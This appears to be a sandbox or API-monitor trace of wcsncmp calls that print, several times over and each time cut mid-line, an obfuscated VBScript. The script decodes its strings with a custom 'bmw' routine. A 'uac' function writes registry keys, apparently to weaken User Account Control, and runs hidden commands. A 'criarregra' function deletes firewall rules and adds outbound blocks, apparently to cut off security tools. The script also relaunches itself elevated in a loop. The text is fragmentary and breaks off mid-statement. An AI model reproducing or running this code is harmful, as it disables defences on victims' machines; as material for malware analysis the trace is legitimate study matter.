bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.963] wcsncmp (_String1=",1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0222.963] wcsncmp (_String1="1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.963] wcsncmp (_String1=",1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0222.964] wcsncmp (_String1="1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run 